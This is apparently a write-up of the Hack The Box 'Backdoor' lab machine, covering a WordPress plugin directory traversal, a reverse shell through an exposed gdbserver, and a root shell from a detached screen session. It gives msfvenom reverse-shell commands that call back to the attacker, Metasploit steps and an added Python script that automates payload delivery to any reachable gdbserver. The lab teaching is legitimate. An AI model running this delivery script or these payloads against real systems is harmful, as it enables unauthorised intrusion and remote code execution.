In this post, I would like to share a walkthrough of the Backdoor machine from Hack The Box.
The machine is rated Easy on Hack The Box.
What will you gain from the Backdoor machine?
For the user flag, you will exploit a directory traversal in the WordPress eBook Download plugin to find a listening gdbserver, then exploit gdbserver itself. For the gdbserver part, I show two ways to get the user shell: manually with gdb, and with Metasploit.
For the root flag, you will abuse a SUID screen binary to get a root shell.
Information Gathering on Backdoor Machine
Once the VPN connection is up (the connection pack is downloaded from Hack The Box), we start information gathering on the machine with nmap -sC -sV -p- -Pn <IP Address> (-Pn is the current spelling of the older -PN flag: skip host discovery and scan anyway).
Nmap reports only ports 22 (SSH) and 80 (HTTP), and the web server redirects to http://backdoor.htb, so add that hostname to /etc/hosts before browsing.
Let's browse the website to look for anything we can exploit.
Nothing in the interface is directly useful for escalation, but the site is clearly powered by WordPress.
Let's run wpscan, which enumerates the WordPress install and flags known vulnerabilities.
It takes some time to return results.
In the meantime, we can check the WordPress directories manually.
From experience with WordPress, /wp-content/plugins is usually worth a look.
Browsing the plugins directory, we notice an ebook-download plugin directory that we can come back to.
Requesting the plugin's filedownload.php directly returns a blank page.
Let's search the internet for known ebook-download exploits.
The results show that the plugin is vulnerable to a directory traversal that returns the contents of arbitrary files on the server. The post calls this Local File Inclusion (LFI); strictly it is a file read, not an include, but either way it lets us read any file the web server user can open.
We can test the traversal with Burp Suite, and use wfuzz to enumerate which paths are readable through it.
Going a little further, we retrieve output showing that gdbserver is running and listening on port 1337.
Step 1: Manual exploitation with msfvenom and gdb
First we generate a reverse-shell ELF with msfvenom, for example msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<any port> -f elf -o <filename>.elf. Note that meterpreter/reverse_tcp is a staged payload: it expects a Metasploit handler to send it the second stage, so a plain nc listener will only see the connection. If you want a usable shell on nc, generate linux/x64/shell_reverse_tcp instead.
Start gdb on the attacker machine.
Connect to the target's gdbserver with the command "target extended-remote 10.10.11.125:1337".
The first attempt timed out.
Running it a second time worked.
Then run the following commands:
remote put <filename>.elf <filename>.elf
set remote exec-file /home/user/<filename>.elf
show remote exec-file
Start an nc listener on the attacker machine.
To launch the uploaded binary and get the reverse shell connection back, execute the following in gdb (the msfvenom ELF has no symbol table, so gdb will report that main is not defined; run alone is what starts the binary on the target):
b main
run
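The whole delivery sequence as one script, as an added example that is not part of the original post. It builds the same msfvenom and gdb command lines the walkthrough types by hand and hands off to the real tools. It assumes msfvenom and gdb are on PATH, that gdbserver's working directory is /home/user (where remote put lands the file, as in the post), and that nc -lvnp is already listening on LPORT; the payload is switched to the unstaged linux/x64/shell_reverse_tcp so the nc listener gets a real shell.

```python
"""Scripted msfvenom + gdb delivery against a remote gdbserver.

Added example for this write-up, not code from the original post. Assumed:
tools on PATH, remote working directory /home/user, nc listener running separately.
"""
import shutil
import subprocess
from pathlib import Path

# Unstaged payload: it connects to nc carrying a shell. The post's
# linux/x64/meterpreter/reverse_tcp is staged and needs a Metasploit handler.
PAYLOAD = "linux/x64/shell_reverse_tcp"


def msfvenom_argv(lhost, lport, out):
    return ["msfvenom", "-p", PAYLOAD, f"LHOST={lhost}", f"LPORT={lport}",
            "-f", "elf", "-o", str(out)]


def gdb_commands(target, elf, remote_dir="/home/user"):
    """gdb commands in order: connect, upload, point exec-file at the upload, run.
    No breakpoint: the msfvenom ELF has no symbols, so 'b main' cannot resolve."""
    name = Path(elf).name
    return [
        f"target extended-remote {target}",
        f"remote put {elf} {name}",           # lands in gdbserver's working directory
        f"set remote exec-file {remote_dir}/{name}",
        "show remote exec-file",
        "run",
    ]


def gdb_argv(target, elf, remote_dir="/home/user"):
    """gdb invocation with one -ex per command. Deliberately not -batch: gdb
    stays open, as in the manual flow, while the reverse shell is in use."""
    argv = ["gdb", "-q", "-nx"]
    for cmd in gdb_commands(target, elf, remote_dir):
        argv += ["-ex", cmd]
    return argv


def deliver(target, lhost, lport, elf="rev.elf", remote_dir="/home/user"):
    """Generate the payload if it is missing, then run gdb. Blocks while the shell runs."""
    for tool in ("msfvenom", "gdb"):
        if shutil.which(tool) is None:
            raise RuntimeError(f"{tool} not found on PATH")
    if not Path(elf).is_file():
        subprocess.run(msfvenom_argv(lhost, lport, elf), check=True)
    return subprocess.run(gdb_argv(target, elf, remote_dir)).returncode


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} <target:port> <lhost> <lport>")
    deliver(sys.argv[1], sys.argv[2], sys.argv[3])
```

Usage: python3 deliver.py 10.10.11.125:1337 <Your IP> <port>, with nc -lvnp <port> running in another terminal. Leave the gdb process alone while you use the shell; quitting it ends the process it started on the target.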
Voila! The connection comes back to our listener, but with a staged meterpreter payload and a plain nc listener we cannot get a proper shell out of it.
Step 2: Metasploit
I will skip the basic Metasploit setup and focus on running the exploit.
For this activity we use the multi/gdb/gdb_server_exec module from Metasploit.
The screenshot above shows the module options we need to set for the exploit.
Don't forget the payload: run "set payload linux/x64/meterpreter/reverse_tcp" before "run".
With that configuration we get a meterpreter session.
Typing the command shell opens channel 1 (the Metasploit way of dropping to a system shell).
Run python3 -c 'import pty;pty.spawn("/bin/bash")' to upgrade it to an interactive shell.
As usual, we can read the user flag by running the “cat user.txt” command
Escalate to Root Privileges
Run ps aux to see the processes running on the victim machine.
Uwu! We notice screen running as root, started as "SCREEN -dmS root", i.e. a detached root session named root.
For those not familiar with screen: it is a terminal multiplexer; you start a session and can open any number of virtual terminals inside it. On this machine the screen binary is also SUID root.
GTFOBins lists a few things we can do with a SUID screen.
Running screen -x root fails with the error "Must be connected to a terminal".
The error occurs because we still do not have a proper tty. To get one, execute the following and then try again:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
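The triage behind the steps above, as an added example that is not part of the original post: parse ps aux output, pick out detached screen sessions owned by root, confirm the screen binary is setuid root, and check for a controlling terminal before attaching (the missing tty is exactly what produces "Must be connected to a terminal"). The ps sample in the test is constructed; on the real host feed it the output of ps aux and the real path of the screen binary.

```python
"""Spot a root-owned screen session, a SUID screen binary, and a missing tty.

Added example for this write-up, not code from the original post.
"""
import os
import shlex
import stat


def parse_ps_aux(text):
    """Rows of `ps aux` as (user, pid, command); the header line is skipped.
    COMMAND is the 11th column and may contain spaces, so split at most 10 times."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 10)
        if len(parts) == 11:
            rows.append((parts[0], int(parts[1]), parts[10]))
    return rows


def root_screen_sessions(rows):
    """(pid, session_name) for screen processes running as root with -dmS/-S <name>."""
    hits = []
    for user, pid, cmd in rows:
        argv = shlex.split(cmd)
        if user != "root" or not argv or os.path.basename(argv[0]).lower() != "screen":
            continue
        for i, arg in enumerate(argv[:-1]):
            if arg in ("-dmS", "-S"):
                hits.append((pid, argv[i + 1]))
                break
    return hits


def mode_is_setuid_root(uid, mode):
    """True for a file owned by uid 0 with the setuid bit set (raw stat values,
    so it can be tested without a real SUID file)."""
    return uid == 0 and bool(mode & stat.S_ISUID)


def is_setuid_root(path):
    """Same check on a real path, e.g. /usr/bin/screen."""
    st = os.stat(path)
    return mode_is_setuid_root(st.st_uid, st.st_mode)


def attach_command(session, have_tty=None):
    """Command to attach to the session, or None when there is no controlling
    terminal: screen would fail with 'Must be connected to a terminal', so get a
    pty first (python3 -c 'import pty;pty.spawn("/bin/bash")' and export TERM=xterm)."""
    if have_tty is None:
        have_tty = os.isatty(0)
    return f"screen -x {session}" if have_tty else None


if __name__ == "__main__":
    import subprocess
    ps = subprocess.run(["ps", "aux"], capture_output=True, text=True).stdout
    for pid, session in root_screen_sessions(parse_ps_aux(ps)):
        print(f"root screen session {session!r} (pid {pid})")
        print("attach:", attach_command(session) or "no tty, spawn a pty first")
```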
We now have a root shell in the terminal.
As usual, we can read the root flag by running the "cat root.txt" command.
-THE END-
Happy Learning Guys!
Extra Information
The root password hash in /etc/shadow can be used to unlock and read the official write-up on Hack The Box.